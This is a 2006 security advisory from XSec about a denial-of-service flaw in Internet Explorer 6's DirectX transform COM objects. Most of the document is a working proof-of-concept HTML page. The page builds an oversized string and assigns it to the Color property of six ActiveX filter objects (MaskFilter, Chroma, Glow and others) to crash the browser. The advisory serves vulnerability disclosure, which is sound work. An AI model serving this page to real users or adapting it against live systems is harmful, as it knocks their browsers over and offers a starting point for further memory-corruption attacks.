[XSec-06-09]: Internet Explorer Multiple COM Objects Color Property DoS Vulnerability
Advisory ID:
XSec-06-09
Advisory Name:
Internet Explorer Multiple COM Objects Color Property DoS Vulnerability
Release Date:
08/22/2006
Tested on:
Windows 2000/XP Internet Explorer 6.0 SP1
Affected version:
Windows 2000
Windows XP
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
When Internet Explorer Handle Multiple COM
Objects(dxtmsft.dll/dxtmsft3.dll) \
Color Property Put Method, Set a Long Strings to Color Property Will Crash \
Internet Explorer.
Exploit:
=============== Color.htm start ================
<!--
// Internet Explorer Multiple COM Object Color Property DoS Vulnerability
// tested on Windows 2000 SP4/XP SP2
// http://www.xsec.org
// nop (nop#xsec.org)
--!>
<html>
<head>
<title></title>
</head>
</body>
<script>
var i =0;
var Objects = new Array(
// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",
// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",
// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",
// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",
// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",
// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",
null
);
var b = "AAAA";
while(b.length < 0x2000000)
{
b += b;
}
while(Objects[i])
{
var a = null;
window.status = "Create Object " + Objects[i] + "...";
try { a = new ActiveXObject(Objects[i]); } catch(e){}
if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}
i++;
}
window.status = "failed!";
</script>
</body>
</html>
=============== Color.htm end ==================
Link:
http://xsec.org/index.php?module=releases&act=view&type=1&id=17
About XSec:
We are redhat.